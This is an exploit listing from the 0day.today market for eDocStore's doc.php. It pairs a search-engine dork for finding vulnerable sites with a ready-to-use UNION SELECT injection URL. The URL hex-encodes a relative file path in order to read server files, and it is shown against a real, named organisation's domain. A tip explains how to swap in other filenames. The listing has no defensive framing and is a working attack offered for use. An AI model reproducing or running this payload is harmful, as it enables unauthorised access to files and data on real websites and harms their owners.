[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1978
Category
web applications
Date add
24-06-2007
Platform
unsorted
=============================================================
eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability
=============================================================



--==+================================================================================+==--
--==+            eDocStore Latest Versions Local File Inclusion Vulnerbilitys        +==--
--==+================================================================================+==--


AUTHOR: t0pP8uZz & xprog (good work xprog)

SCRIPT DOWNLOAD: N/A

DORK: intext:"Powered by eDocStore"


EXPLOITS:

EXPLOIT 1: http://www.server.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null


EXAMPLES:

EXAMPLE 1: http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

Note/Tip: The filename for the incluson has got to be hexed before you can include it.
Its only required to replace the first hex value before the ","


--==+================================================================================+==--
--==+            eDocStore Latest Versions Local File Inclusion Vulnerbilitys        +==--
--==+================================================================================+==--



#  0day.today [2024-07-07]  #